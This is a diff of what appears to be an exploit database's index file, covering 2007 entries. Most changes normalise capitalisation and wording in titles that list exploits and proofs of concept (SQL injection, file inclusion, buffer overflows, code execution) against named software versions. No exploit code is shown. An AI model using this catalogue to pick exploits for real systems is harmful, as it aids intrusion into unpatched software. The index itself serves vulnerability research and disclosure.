+3903,platforms/php/webapps/3903.php,"Monalbum 0.8.7 - Remote Code Execution",2007-05-11,Dj7xpl,php,webapps,0 +3905,platforms/asp/webapps/3905.txt,"W1L3D4 philboard 0.2 - (W1L3D4_bolum.asp forumid) SQL Injection",2007-05-11,gsy,asp,webapps,0 +3906,platforms/php/webapps/3906.htm,"PHP FirstPost 0.1 - (block.php Include) Remote File Inclusion",2007-05-12,Dj7xpl,php,webapps,0 3907,platforms/php/webapps/3907.txt,"iG Shop 1.4 - (page.php) SQL Injection",2007-05-12,gsy,php,webapps,0 3908,platforms/php/webapps/3908.txt,"YAAP 1.5 - __autoload() Remote File Inclusion",2007-05-12,3l3ctric-Cracker,php,webapps,0 3909,platforms/php/webapps/3909.txt,"Beacon 0.2.0 - (splash.lang.php) Remote File Inclusion",2007-05-12,"ThE TiGeR",php,webapps,0 @@ -3599,7 +3600,7 @@ id,file,description,date,author,platform,type,port 3942,platforms/php/webapps/3942.pl,"SimpNews 2.40.01 - (print.php newnr) SQL Injection",2007-05-16,Silentz,php,webapps,0 3943,platforms/php/webapps/3943.pl,"FAQEngine 4.16.03 - (question.php questionref) SQL Injection",2007-05-16,Silentz,php,webapps,0 3944,platforms/php/webapps/3944.txt,"Mambo com_yanc 1.4 Beta - 'id' SQL Injection",2007-05-17,"Mehmet Ince",php,webapps,0 -3945,platforms/linux/dos/3945.rb,"MagicISO 5.4 (build239) - (.cue) Heap Overflow (PoC)",2007-05-17,n00b,linux,dos,0 +3945,platforms/linux/dos/3945.rb,"MagicISO 5.4 (build239) - '.cue' Heap Overflow (PoC)",2007-05-17,n00b,linux,dos,0 3946,platforms/php/webapps/3946.txt,"GeekLog 2.x - ImageImageMagick.php Remote File Inclusion",2007-05-17,diesl0w,php,webapps,0 3947,platforms/php/webapps/3947.txt,"Build it Fast (bif3) 0.4.1 - Multiple Remote File Inclusion",2007-05-17,"Alkomandoz Hacker",php,webapps,0 3948,platforms/php/webapps/3948.txt,"Libstats 1.0.3 - (template_csv.php) Remote File Inclusion",2007-05-18,"Mehmet Ince",php,webapps,0 @@ -3610,26 +3611,26 @@ id,file,description,date,author,platform,type,port 3953,platforms/php/webapps/3953.txt,"SunLight CMS 5.3 - (root) Remote File Inclusion",2007-05-19,"Mehmet Ince",php,webapps,0 3954,platforms/windows/remote/3954.py,"Rational Software Hidden Administrator 1.7 - Authentication Bypass Exploit",2007-05-19,"Ahmed Siddiqui",windows,remote,69 3955,platforms/php/webapps/3955.py,"Zomplog 3.8 - (mp3playlist.php speler) SQL Injection",2007-05-20,NeoMorphS,php,webapps,0 -3956,platforms/php/webapps/3956.php,"AlstraSoft E-Friends 4.21 - Admin Session Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0 -3957,platforms/php/webapps/3957.php,"AlstraSoft Live Support 1.21 - Admin Credential Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0 -3958,platforms/php/webapps/3958.php,"AlstraSoft Template Seller Pro 3.25 - Admin Password Change Exploit",2007-05-20,BlackHawk,php,webapps,0 -3959,platforms/php/webapps/3959.php,"AlstraSoft Template Seller Pro 3.25 - Remote Code Execution Exploit",2007-05-20,BlackHawk,php,webapps,0 -3960,platforms/php/webapps/3960.php,"Wordpress 2.1.3 - admin-ajax.php SQL Injection Blind Fishing Exploit",2007-05-21,waraxe,php,webapps,0 +3956,platforms/php/webapps/3956.php,"Alstrasoft e-Friends 4.21 - Admin Session Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0 +3957,platforms/php/webapps/3957.php,"Alstrasoft Live Support 1.21 - Admin Credential Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0 +3958,platforms/php/webapps/3958.php,"Alstrasoft Template Seller Pro 3.25 - Admin Password Change Exploit",2007-05-20,BlackHawk,php,webapps,0 +3959,platforms/php/webapps/3959.php,"Alstrasoft Template Seller Pro 3.25 - Remote Code Execution",2007-05-20,BlackHawk,php,webapps,0 +3960,platforms/php/webapps/3960.php,"WordPress 2.1.3 - admin-ajax.php SQL Injection Blind Fishing Exploit",2007-05-21,waraxe,php,webapps,0 3961,platforms/windows/remote/3961.html,"LeadTools Raster Variant - 'LTRVR14e.dll' Remote File Overwrite",2007-05-21,shinnai,windows,remote,0 -3962,platforms/php/webapps/3962.txt,"Ol Bookmarks Manager 0.7.4 - (root) Remote File Inclusion",2007-05-21,"ThE TiGeR",php,webapps,0 +3962,platforms/php/webapps/3962.txt,"Ol BookMarks Manager 0.7.4 - (root) Remote File Inclusion",2007-05-21,"ThE TiGeR",php,webapps,0 3963,platforms/php/webapps/3963.txt,"TutorialCMS 1.01 - Authentication Bypass",2007-05-21,Silentz,php,webapps,0 -3964,platforms/php/webapps/3964.txt,"Ol Bookmarks Manager 0.7.4 - SQL Injection",2007-05-21,"Mehmet Ince",php,webapps,0 +3964,platforms/php/webapps/3964.txt,"Ol BookMarks Manager 0.7.4 - SQL Injection",2007-05-21,"Mehmet Ince",php,webapps,0 3965,platforms/windows/dos/3965.pl,"Microsoft IIS 6.0 - /AUX / '.aspx' Remote Denial of Service",2007-05-21,kingcope,windows,dos,0 3966,platforms/windows/remote/3966.php,"Pegasus ImagN - ActiveX Control Remote Buffer Overflow",2007-05-21,rgod,windows,remote,0 3967,platforms/windows/remote/3967.html,"Virtual CD 9.0.0.2 - (vc9api.DLL) Remote Shell Commands Execution Exploit",2007-05-21,rgod,windows,remote,0 3968,platforms/windows/remote/3968.html,"KSign KSignSWAT 2.0.3.3 - ActiveX Control Remote Buffer Overflow Exploit",2007-05-22,"KIM Kee-hong",windows,remote,0 3969,platforms/windows/dos/3969.html,"LeadTools ISIS Control - (ltisi14E.ocx v.14.5.0.44) Remote Denial of Service",2007-05-22,shinnai,windows,dos,0 3970,platforms/php/webapps/3970.txt,"BtiTracker 1.4.1 - (become admin) SQL Injection",2007-05-22,m@ge|ozz,php,webapps,0 -3971,platforms/php/webapps/3971.php,"NavBoard 2.6.0 - Remote Code Execution Exploit",2007-05-23,Dj7xpl,php,webapps,0 +3971,platforms/php/webapps/3971.php,"NavBoard 2.6.0 - Remote Code Execution",2007-05-23,Dj7xpl,php,webapps,0 3972,platforms/php/webapps/3972.txt,"Scallywag - 'template.php path' Remote File Inclusion",2007-05-23,"Mehmet Ince",php,webapps,0 3973,platforms/windows/dos/3973.html,"Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote Denial of Service",2007-05-23,shinnai,windows,dos,0 3974,platforms/php/webapps/3974.pl,"Dokeos 1.8.0 - (my_progress.php course) SQL Injection",2007-05-23,Silentz,php,webapps,0 -3975,platforms/windows/local/3975.c,"MagicISO 5.4 (build239) - .cue File Local Buffer Overflow",2007-05-23,vade79,windows,local,0 +3975,platforms/windows/local/3975.c,"MagicISO 5.4 (build239) - '.cue' File Local Buffer Overflow",2007-05-23,vade79,windows,local,0 3976,platforms/windows/dos/3976.pl,"Microsoft Visual Basic 6.0 Project - (Company Name) Stack Overflow (PoC)",2007-05-23,UmZ,windows,dos,0 3977,platforms/windows/dos/3977.pl,"Microsoft Visual Basic 6.0 Project - (Description) Stack Overflow (PoC)",2007-05-23,UmZ,windows,dos,0 3978,platforms/windows/dos/3978.pl,"UltraISO 8.6.2.2011 - (Cue/Bin Files) Local Buffer Overflow (PoC)",2007-05-24,n00b,windows,dos,0 @@ -3639,10 +3640,10 @@ id,file,description,date,author,platform,type,port 3982,platforms/windows/remote/3982.html,"Dart Communications PowerTCP - Service Control Remote Buffer Overflow Exploit",2007-05-24,rgod,windows,remote,0 3983,platforms/php/webapps/3983.txt,"FirmWorX 0.1.2 - Multiple Remote File Inclusion",2007-05-24,DeltahackingTEAM,php,webapps,0 3984,platforms/windows/remote/3984.html,"Dart Communications PowerTCP - ZIP Compression Remote Buffer Overflow Exploit",2007-05-25,rgod,windows,remote,0 -3985,platforms/osx/local/3985.txt,"Mac OSX 10.4.8 - pppd Plugin Loading Privilege Escalation",2007-05-25,qaaz,osx,local,0 +3985,platforms/osx/local/3985.txt,"Apple Mac OS X 10.4.8 - pppd Plugin Loading Privilege Escalation",2007-05-25,qaaz,osx,local,0 3986,platforms/windows/dos/3986.html,"LeadTools Raster - Dialog File_D Object Remote Buffer Overflow",2007-05-25,shinnai,windows,dos,0 3987,platforms/php/webapps/3987.txt,"Webavis 0.1.1 - (class.php root) Remote File Inclusion",2007-05-25,"ThE TiGeR",php,webapps,0 -3988,platforms/php/webapps/3988.php,"gCards 1.46 - SQL Injection / Remote Code Execution Exploit",2007-05-25,Silentz,php,webapps,0 +3988,platforms/php/webapps/3988.php,"gCards 1.46 - SQL Injection / Remote Code Execution",2007-05-25,Silentz,php,webapps,0 3989,platforms/php/webapps/3989.pl,"My Little Forum 1.7 - (user.php id) SQL Injection",2007-05-25,Silentz,php,webapps,0 3990,platforms/php/webapps/3990.txt,"vBulletin vBGSiteMap 2.41 - (root) Remote File Inclusion",2007-05-25,"Cold Zero",php,webapps,0 3991,platforms/php/webapps/3991.txt,"OpenBASE 0.6a - (root_prefix) Remote File Inclusion",2007-05-25,DeltahackingTEAM,php,webapps,0 @@ -3650,24 +3651,24 @@ id,file,description,date,author,platform,type,port 3993,platforms/windows/remote/3993.html,"Microsoft Internet Explorer 6 / Ademco co. ltd. ATNBaseLoader100 Module - Remote Buffer Overflow Exploit",2007-05-26,rgod,windows,remote,0 3994,platforms/php/webapps/3994.txt,"Mazens PHP Chat V3 (basepath) - Remote File Inclusion",2007-05-26,"ThE TiGeR",php,webapps,0 3995,platforms/php/webapps/3995.txt,"TROforum 0.1 - (admin.php site_url) Remote File Inclusion",2007-05-26,"Mehmet Ince",php,webapps,0 -3996,platforms/windows/remote/3996.c,"Apache 2.0.58 mod_rewrite - Remote Overflow (Windows 2003)",2007-05-26,fabio/b0x,windows,remote,80 +3996,platforms/windows/remote/3996.c,"Apache 2.0.58 Mod_Rewrite - Remote Overflow (Windows 2003)",2007-05-26,fabio/b0x,windows,remote,80 3997,platforms/php/webapps/3997.txt,"Frequency Clock 0.1b - (securelib) Remote File Inclusion",2007-05-27,"ThE TiGeR",php,webapps,0 -3998,platforms/php/webapps/3998.php,"Fundanemt 2.2.0 - (spellcheck.php) Remote Code Execution Exploit",2007-05-27,Kacper,php,webapps,0 +3998,platforms/php/webapps/3998.php,"Fundanemt 2.2.0 - (spellcheck.php) Remote Code Execution",2007-05-27,Kacper,php,webapps,0 3999,platforms/php/webapps/3999.txt,"Vistered Little 1.6a - (skin) Remote File Disclosure",2007-05-28,GoLd_M,php,webapps,0 4000,platforms/php/webapps/4000.txt,"wanewsletter 2.1.3 - Remote File Inclusion",2007-05-28,Mogatil,php,webapps,0 4001,platforms/windows/local/4001.cpp,"UltraISO 8.6.2.2011 - (Cue/Bin Files) Local Buffer Overflow (1)",2007-05-28,n00b,windows,local,0 4002,platforms/windows/local/4002.py,"UltraISO 8.6.2.2011 - (Cue/Bin Files) Local Buffer Overflow (2)",2007-05-28,"Thomas Pollet",windows,local,0 4003,platforms/php/webapps/4003.sh,"Joomla Component Phil-a-Form 1.2.0.0 - SQL Injection",2007-05-28,CypherXero,php,webapps,0 -4004,platforms/php/webapps/4004.php,"Inout Search Engine - Remote Code Execution Exploit",2007-05-29,BlackHawk,php,webapps,0 +4004,platforms/php/webapps/4004.php,"Inout Search Engine - Remote Code Execution",2007-05-29,BlackHawk,php,webapps,0 4005,platforms/php/webapps/4005.txt,"AdminBot 9.0.5 - (live_status.lib.php ROOT) Remote File Inclusion",2007-05-29,"ThE TiGeR",php,webapps,0 -4006,platforms/php/webapps/4006.php,"Pheap 2.0 - Authentication Bypass / Remote Code Execution Exploit",2007-05-29,Silentz,php,webapps,0 +4006,platforms/php/webapps/4006.php,"Pheap 2.0 - Authentication Bypass / Remote Code Execution",2007-05-29,Silentz,php,webapps,0 4007,platforms/asp/webapps/4007.txt,"Vizayn Urun Tanitim Sistemi 0.2 - (tr) SQL Injection",2007-05-30,BAHADIR,asp,webapps,0 4008,platforms/windows/remote/4008.html,"Zenturi ProgramChecker - ActiveX File Download/Overwrite",2007-05-30,shinnai,windows,remote,0 4009,platforms/windows/dos/4009.html,"EDraw Office Viewer Component - Denial of Service",2007-05-30,shinnai,windows,dos,0 4010,platforms/windows/remote/4010.html,"EDraw Office Viewer Component - Unsafe Method Exploit",2007-05-30,shinnai,windows,remote,0 4011,platforms/windows/dos/4011.html,"LeadTools Raster ISIS Object (LTRIS14e.DLL 14.5.0.44) - Remote Buffer Overflow",2007-05-30,shinnai,windows,dos,0 4012,platforms/windows/dos/4012.html,"LeadTools Raster OCR Document Object Library - Memory Corruption Exploit",2007-05-30,shinnai,windows,dos,0 -4013,platforms/osx/local/4013.txt,"Mac OSX < 2007-005 - (vpnd) Privilege Escalation",2007-05-30,"Kevin Finisterre",osx,local,0 +4013,platforms/osx/local/4013.txt,"Apple Mac OS X < 2007-005 - (vpnd) Privilege Escalation",2007-05-30,"Kevin Finisterre",osx,local,0 4014,platforms/windows/remote/4014.py,"Eudora 7.1.0.9 - (IMAP FLAGS) Remote SEH Overwrite",2007-05-30,h07,windows,remote,0 4015,platforms/windows/remote/4015.html,"Vivotek Motion Jpeg Control - (MjpegDecoder.dll 2.0.0.13) Remote Exploit",2007-05-31,rgod,windows,remote,0 4016,platforms/windows/remote/4016.sh,"Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass Exploit",2007-05-31,Sha0,windows,remote,0 @@ -3675,26 +3676,26 @@ id,file,description,date,author,platform,type,port 4019,platforms/php/webapps/4019.php,"Particle Gallery 1.0.1 - SQL Injection",2007-06-01,Silentz,php,webapps,0 4020,platforms/php/webapps/4020.php,"RevokeBB 1.0 RC4 - Blind SQL Injection / Hash Retrieve Exploit",2007-06-01,BlackHawk,php,webapps,0 4021,platforms/windows/remote/4021.html,"Zenturi ProgramChecker ActiveX - 'sasatl.dll' Remote Buffer Overflow Exploit",2007-06-01,shinnai,windows,remote,0 -4022,platforms/php/webapps/4022.htm,"XOOPS Module icontent 1.0/4.5 - Remote File Inclusion Exploit",2007-06-01,GoLd_M,php,webapps,0 +4022,platforms/php/webapps/4022.htm,"XOOPS Module icontent 1.0/4.5 - Remote File Inclusion",2007-06-01,GoLd_M,php,webapps,0 4023,platforms/windows/remote/4023.html,"Microsoft Internet Explorer 6 / Provideo Camimage - (ISSCamControl.dll 1.0.1.5) Remote Buffer Overflow Exploit",2007-06-02,rgod,windows,remote,0 -4024,platforms/windows/local/4024.rb,"DVD X Player 4.1 Professional - .PLF file Buffer Overflow",2007-06-02,n00b,windows,local,0 -4025,platforms/php/webapps/4025.php,"Quick.Cart 2.2 - Remote File Inclusion / Local File Inclusion Remote Code Execution Exploit",2007-06-02,Kacper,php,webapps,0 +4024,platforms/windows/local/4024.rb,"DVD X Player 4.1 Professional - '.PLF' File Buffer Overflow",2007-06-02,n00b,windows,local,0 +4025,platforms/php/webapps/4025.php,"Quick.Cart 2.2 - Remote File Inclusion / Local File Inclusion Remote Code Execution",2007-06-02,Kacper,php,webapps,0 4026,platforms/php/webapps/4026.php,"PNPHPBB2 <= 1.2 - (index.php c) SQL Injection",2007-06-03,Kacper,php,webapps,0 -4027,platforms/windows/remote/4027.py,"IBM Tivoli Provisioning Manager - Pre-Authenticated Remote Exploit",2007-06-03,muts,windows,remote,8080 +4027,platforms/windows/remote/4027.py,"IBM Tivoli Provisioning Manager - Pre-Authentication Remote Exploit",2007-06-03,muts,windows,remote,8080 4028,platforms/linux/local/4028.txt,"Screen 4.0.3 (OpenBSD) - Local Authentication Bypass",2008-06-18,Rembrandt,linux,local,0 -4029,platforms/php/webapps/4029.php,"Sendcard 3.4.1 - (Local File Inclusion) Remote Code Execution Exploit",2007-06-04,Silentz,php,webapps,0 +4029,platforms/php/webapps/4029.php,"Sendcard 3.4.1 - (Local File Inclusion) Remote Code Execution",2007-06-04,Silentz,php,webapps,0 4030,platforms/php/webapps/4030.php,"EQdkp 1.3.2 - (listmembers.php rank) SQL Injection",2007-06-04,Silentz,php,webapps,0 4031,platforms/php/webapps/4031.txt,"Madirish Webmail 2.0 - (addressbook.php) Remote File Inclusion",2007-06-04,BoZKuRTSeRDaR,php,webapps,0 4032,platforms/tru64/remote/4032.pl,"HP Tru64 - Remote Secure Shell User Enumeration Exploit",2007-06-04,bunker,tru64,remote,0 4033,platforms/windows/dos/4033.rb,"SNMPc 7.0.18 - Remote Denial of Service (Metasploit)",2007-06-04,"En Douli",windows,dos,0 4034,platforms/php/webapps/4034.txt,"Kravchuk letter script 1.0 - (scdir) Remote File Inclusion",2007-06-05,"Mehmet Ince",php,webapps,0 4035,platforms/php/webapps/4035.txt,"Comicsense 0.2 - index.php 'epi' SQL Injection (1)",2007-06-05,s0cratex,php,webapps,0 -4036,platforms/php/webapps/4036.php,"PBLang 4.67.16.a - Remote Code Execution Exploit",2007-06-06,Silentz,php,webapps,0 +4036,platforms/php/webapps/4036.php,"PBLang 4.67.16.a - Remote Code Execution",2007-06-06,Silentz,php,webapps,0 4037,platforms/php/webapps/4037.pl,"Comicsense 0.2 - index.php 'epi' SQL Injection (2)",2007-06-06,Silentz,php,webapps,0 4038,platforms/multiple/dos/4038.pl,"DRDoS - Distributed Reflection Denial of Service",2007-06-06,whoppix,multiple,dos,0 -4039,platforms/php/webapps/4039.txt,"Wordpress 2.2 - (xmlrpc.php) SQL Injection",2007-06-06,Slappter,php,webapps,0 +4039,platforms/php/webapps/4039.txt,"WordPress 2.2 - (xmlrpc.php) SQL Injection",2007-06-06,Slappter,php,webapps,0 4040,platforms/asp/webapps/4040.txt,"Kartli Alisveris Sistemi 1.0 - SQL Injection",2007-06-06,kerem125,asp,webapps,0 -4041,platforms/php/webapps/4041.htm,"NewsSync for phpBB 1.5.0rc6 - Remote File Inclusion Exploit",2007-06-07,GoLd_M,php,webapps,0 +4041,platforms/php/webapps/4041.htm,"NewsSync for phpBB 1.5.0rc6 - Remote File Inclusion",2007-06-07,GoLd_M,php,webapps,0 4042,platforms/windows/remote/4042.html,"Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow",2007-06-07,Excepti0n,windows,remote,0 4043,platforms/windows/remote/4043.html,"Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow 2",2007-06-07,Excepti0n,windows,remote,0 4044,platforms/windows/dos/4044.txt,"Microsoft Windows GDI+ - ICO File Remote Denial of Service",2007-06-07,Kad,windows,dos,0 @@ -3706,8 +3707,8 @@ id,file,description,date,author,platform,type,port 4051,platforms/windows/local/4051.rb,"MoviePlay 4.76 - '.lst' Local Buffer Overflow",2007-06-08,n00b,windows,local,0 4052,platforms/windows/remote/4052.c,"Yahoo! Messenger Webcam 8.1 - (Ywcvwr.dll) Download / Execute Exploit",2007-06-08,Excepti0n,windows,remote,0 4053,platforms/windows/remote/4053.c,"Yahoo! Messenger Webcam 8.1 - (Ywcupl.dll) Download / Execute Exploit",2007-06-08,Excepti0n,windows,remote,0 -4054,platforms/php/webapps/4054.php,"e-Vision CMS 2.02 - SQL Injection / Remote Code Execution Exploit",2007-06-08,Silentz,php,webapps,0 -4055,platforms/php/webapps/4055.htm,"PHP Real Estate Classifieds - Remote File Inclusion Exploit",2007-06-09,"not sec group",php,webapps,0 +4054,platforms/php/webapps/4054.php,"e-Vision CMS 2.02 - SQL Injection / Remote Code Execution",2007-06-08,Silentz,php,webapps,0 +4055,platforms/php/webapps/4055.htm,"PHP Real Estate Classifieds - Remote File Inclusion",2007-06-09,"not sec group",php,webapps,0 4056,platforms/windows/dos/4056.html,"Internet Download Accelerator 5.2 - Remote Buffer Overflow (PoC)",2007-06-09,DeltahackingTEAM,windows,dos,0 4057,platforms/asp/webapps/4057.txt,"GeometriX Download Portal - 'down_indir.asp id' SQL Injection",2007-06-09,CyberGhost,asp,webapps,0 4058,platforms/windows/dos/4058.py,"Ace-FTP Client 1.24a - Remote Buffer Overflow (PoC)",2007-06-10,n00b,windows,dos,0 @@ -3727,25 +3728,25 @@ id,file,description,date,author,platform,type,port 4072,platforms/php/webapps/4072.txt,"PHP::HTML 0.6.4 - (PHPhtml.php) Remote File Inclusion",2007-06-14,o0xxdark0o,php,webapps,0 4074,platforms/php/webapps/4074.txt,"PHPMyInventory 2.8 - (global.inc.php) Remote File Inclusion",2007-06-16,o0xxdark0o,php,webapps,0 4075,platforms/php/webapps/4075.txt,"YourFreeScreamer 1.0 - (serverPath) Remote File Inclusion",2007-06-17,Crackers_Child,php,webapps,0 -4076,platforms/php/webapps/4076.php,"MiniBB 2.0.5 - (language) Local File Inclusion Exploit",2007-06-17,Dj7xpl,php,webapps,0 +4076,platforms/php/webapps/4076.php,"MiniBB 2.0.5 - 'Language' Local File Inclusion",2007-06-17,Dj7xpl,php,webapps,0 4078,platforms/php/webapps/4078.php,"Solar Empire 2.9.1.1 - Blind SQL Injection / Hash Retrieve Exploit",2007-06-18,BlackHawk,php,webapps,0 4079,platforms/php/webapps/4079.txt,"MiniBill 1.2.5 - (run_billing.php) Remote File Inclusion",2007-06-18,Abo0od,php,webapps,0 4080,platforms/windows/local/4080.php,"PHP 5.2.3 Tidy extension - Local Buffer Overflow",2007-06-19,rgod,windows,local,0 -4081,platforms/php/webapps/4081.php,"Jasmine CMS 1.0 - SQL Injection / Remote Code Execution Exploit",2007-06-19,Silentz,php,webapps,0 +4081,platforms/php/webapps/4081.php,"Jasmine CMS 1.0 - SQL Injection / Remote Code Execution",2007-06-19,Silentz,php,webapps,0 4082,platforms/php/webapps/4082.pl,"LiveCMS 3.4 - (categoria.php cid) SQL Injection",2007-06-20,g00ns,php,webapps,0 4083,platforms/asp/webapps/4083.txt,"W1L3D4 WEBmarket 0.1 - SQL Injection",2007-06-20,Crackers_Child,asp,webapps,0 4084,platforms/php/webapps/4084.txt,"XOOPS Module wiwimod 0.4 - Remote File Inclusion",2007-06-20,GoLd_M,php,webapps,0 4085,platforms/php/webapps/4085.txt,"Musoo 0.21 - Remote File Inclusion",2007-06-20,GoLd_M,php,webapps,0 -4086,platforms/php/webapps/4086.pl,"LAN Management System (LMS) 1.9.6 - Remote File Inclusion Exploit",2007-06-20,Kw3[R]Ln,php,webapps,0 +4086,platforms/php/webapps/4086.pl,"LAN Management System (LMS) 1.9.6 - Remote File Inclusion",2007-06-20,Kw3[R]Ln,php,webapps,0 4087,platforms/linux/remote/4087.c,"BitchX 1.1-final - (EXEC) Remote Command Execution Exploit",2007-06-21,clarity_,linux,remote,0 -4089,platforms/php/webapps/4089.pl,"SerWeb 0.9.4 - (load_lang.php) Remote File Inclusion Exploit",2007-06-21,Kw3[R]Ln,php,webapps,0 +4089,platforms/php/webapps/4089.pl,"SerWeb 0.9.4 - (load_lang.php) Remote File Inclusion",2007-06-21,Kw3[R]Ln,php,webapps,0 4090,platforms/php/webapps/4090.pl,"Powl 0.94 - (htmledit.php) Remote File Inclusion",2007-06-22,Kw3[R]Ln,php,webapps,0 4091,platforms/php/webapps/4091.txt,"Sun Board 1.00.00 alpha - Remote File Inclusion",2007-06-22,GoLd_M,php,webapps,0 -4092,platforms/php/webapps/4092.txt,"netclassifieds - (SQL Injection / Cross-Site Scripting / Full Path) Multiple Vulnerabilities",2007-06-22,"laurent gaffié ",php,webapps,0 +4092,platforms/php/webapps/4092.txt,"NetClassifieds - (SQL Injection / Cross-Site Scripting / Full Path) Multiple Vulnerabilities",2007-06-22,"laurent gaffié ",php,webapps,0 4093,platforms/multiple/remote/4093.pl,"Apache mod_jk 1.2.19/1.2.20 - Remote Buffer Overflow",2007-06-22,eliteboy,multiple,remote,80 4094,platforms/windows/remote/4094.html,"BarCode ActiveX Control BarCodeAx.dll 4.9 - Remote Overflow",2007-06-22,callAX,windows,remote,0 4095,platforms/php/webapps/4095.txt,"Pharmacy System 2.0 - (index.php ID) SQL Injection",2007-06-24,t0pP8uZz,php,webapps,0 -4096,platforms/php/webapps/4096.php,"Pluxml 0.3.1 - Remote Code Execution Exploit",2007-06-24,DarkFig,php,webapps,0 +4096,platforms/php/webapps/4096.php,"Pluxml 0.3.1 - Remote Code Execution",2007-06-24,DarkFig,php,webapps,0 4097,platforms/php/webapps/4097.txt,"dagger Web engine 23jan2007 - Remote File Inclusion",2007-06-24,Katatafish,php,webapps,0 4098,platforms/php/webapps/4098.php,"Simple Invoices 2007 05 25 - 'index.php submit' SQL Injection",2007-06-24,Kacper,php,webapps,0 4099,platforms/php/webapps/4099.txt,"e107 <= 0.7.8 - (photograph) Arbitrary File Upload",2007-06-24,g00ns,php,webapps,0 @@ -3762,9 +3763,9 @@ id,file,description,date,author,platform,type,port 4110,platforms/windows/remote/4110.html,"Avaxswf.dll 1.0.0.1 from Avax Vector - ActiveX Arbitrary Data Write",2007-06-26,callAX,windows,remote,0 4111,platforms/php/webapps/4111.txt,"PHPSiteBackup 0.1 - (pcltar.lib.php) Remote File Inclusion",2007-06-26,GoLd_M,php,webapps,0 4112,platforms/php/webapps/4112.txt,"EVA-Web 1.1<= 2.2 - (index.php3) Remote File Inclusion",2007-06-26,g00ns,php,webapps,0 -4113,platforms/php/webapps/4113.pl,"Wordpress 2.2 - (wp-app.php) Arbitrary File Upload Exploit",2007-06-26,"Alexander Concha",php,webapps,0 -4114,platforms/php/webapps/4114.txt,"elkagroup Image Gallery 1.0 - SQL Injection",2007-06-26,t0pP8uZz,php,webapps,0 -4115,platforms/php/webapps/4115.txt,"QuickTalk forum 1.3 - (lang) Local File Inclusion",2007-06-27,Katatafish,php,webapps,0 +4113,platforms/php/webapps/4113.pl,"WordPress 2.2 - (wp-app.php) Arbitrary File Upload Exploit",2007-06-26,"Alexander Concha",php,webapps,0 +4114,platforms/php/webapps/4114.txt,"Elkagroup Image Gallery 1.0 - SQL Injection",2007-06-26,t0pP8uZz,php,webapps,0 +4115,platforms/php/webapps/4115.txt,"QuickTalk forum 1.3 - 'lang' Local File Inclusion",2007-06-27,Katatafish,php,webapps,0 4116,platforms/php/webapps/4116.txt,"QuickTicket 1.2 - (qti_checkname.php) Local File Inclusion",2007-06-27,Katatafish,php,webapps,0 4118,platforms/windows/dos/4118.html,"RealNetworks RealPlayer/HelixPlayer - SMIL wallclock Stack Overflow (PoC)",2007-06-27,axis,windows,dos,0 4119,platforms/windows/remote/4119.html,"HP Digital Imaging (hpqxml.dll 2.0.0.133) - Arbitrary Data Write Exploit",2007-06-27,callAX,windows,remote,0 @@ -3799,13 +3800,13 @@ id,file,description,date,author,platform,type,port 4148,platforms/windows/dos/4148.html,"EnjoySAP ActiveX kweditcontrol.kwedit.1 - Remote Stack Overflow (PoC)",2007-07-05,"Mark Litchfield",windows,dos,0 4149,platforms/windows/dos/4149.html,"EnjoySAP ActiveX rfcguisink.rfcguisink.1 - Remote Heap Overflow (PoC)",2007-07-05,"Mark Litchfield",windows,dos,0 4150,platforms/php/webapps/4150.txt,"VRNews 1.1.1 - 'admin.php' Remote Security Bypass",2007-07-05,R4M!,php,webapps,0 -4151,platforms/php/webapps/4151.sh,"AsteriDex 3.0 - (callboth.php) Remote Code Execution Exploit",2007-07-05,"Carl Livitt",php,webapps,0 +4151,platforms/php/webapps/4151.sh,"AsteriDex 3.0 - (callboth.php) Remote Code Execution",2007-07-05,"Carl Livitt",php,webapps,0 4152,platforms/windows/remote/4152.py,"ViRC 2.0 - (JOIN Response) Remote SEH Overwrite",2007-07-06,h07,windows,remote,0 4153,platforms/php/webapps/4153.txt,"PHPVID 0.9.9 - (categories_type.php cat) SQL Injection",2007-07-06,t0pP8uZz,php,webapps,0 4154,platforms/php/webapps/4154.txt,"eMeeting Online Dating Software 5.2 - SQL Injection",2007-07-06,t0pP8uZz,php,webapps,0 4155,platforms/windows/remote/4155.html,"HP Digital Imaging (hpqvwocx.dll 2.1.0.556) - SaveToFile() Exploit",2007-07-06,shinnai,windows,remote,0 -4156,platforms/php/webapps/4156.txt,"limesurvey (phpsurveyor) 1.49rc2 - Remote File Inclusion",2007-07-06,"Yakir Wizman",php,webapps,0 -4157,platforms/windows/remote/4157.cpp,"SAP DB 7.4 - WebTools Remote SEH overwrite Exploit",2007-07-07,Heretic2,windows,remote,9999 +4156,platforms/php/webapps/4156.txt,"LimeSurvey (phpsurveyor) 1.49rc2 - Remote File Inclusion",2007-07-06,"Yakir Wizman",php,webapps,0 +4157,platforms/windows/remote/4157.cpp,"SAP DB 7.4 - WebTools Remote SEH Overwrite Exploit",2007-07-07,Heretic2,windows,remote,9999 4158,platforms/windows/remote/4158.html,"NeoTracePro 3.25 - ActiveX TraceTarget() Remote Buffer Overflow Exploit",2007-07-07,nitr0us,windows,remote,0 4159,platforms/php/webapps/4159.txt,"GameSiteScript 3.1 - (profile id) SQL Injection",2007-07-07,Xenduer77,php,webapps,0 4160,platforms/windows/remote/4160.html,"Chilkat Zip ActiveX Component 12.4 - Multiple Insecure Methods Exploit",2007-07-07,shinnai,windows,remote,0 @@ -3818,8 +3819,8 @@ id,file,description,date,author,platform,type,port 4167,platforms/php/webapps/4167.txt,"OpenLD 1.2.2 - (index.php id) SQL Injection",2007-07-10,CypherXero,php,webapps,0 4168,platforms/windows/dos/4168.vbs,"Sun Java WebStart - JNLP Stack Buffer Overflow (PoC)",2007-07-10,ZhenHan.Liu,windows,dos,0 4169,platforms/php/webapps/4169.txt,"FlashBB 1.1.8 - (sendmsg.php) Remote File Inclusion",2007-07-10,Kw3[R]Ln,php,webapps,0 -4170,platforms/windows/remote/4170.html,"Program Checker - (sasatl.dll 1.5.0.531) Javascript Heap Spraying Exploit",2007-07-10,callAX,windows,remote,0 -4171,platforms/php/webapps/4171.pl,"Mail Machine 3.989 - Local File Inclusion Exploit",2007-07-10,"H4 / XPK",php,webapps,0 +4170,platforms/windows/remote/4170.html,"Program Checker - (sasatl.dll 1.5.0.531) JavaScript Heap Spraying 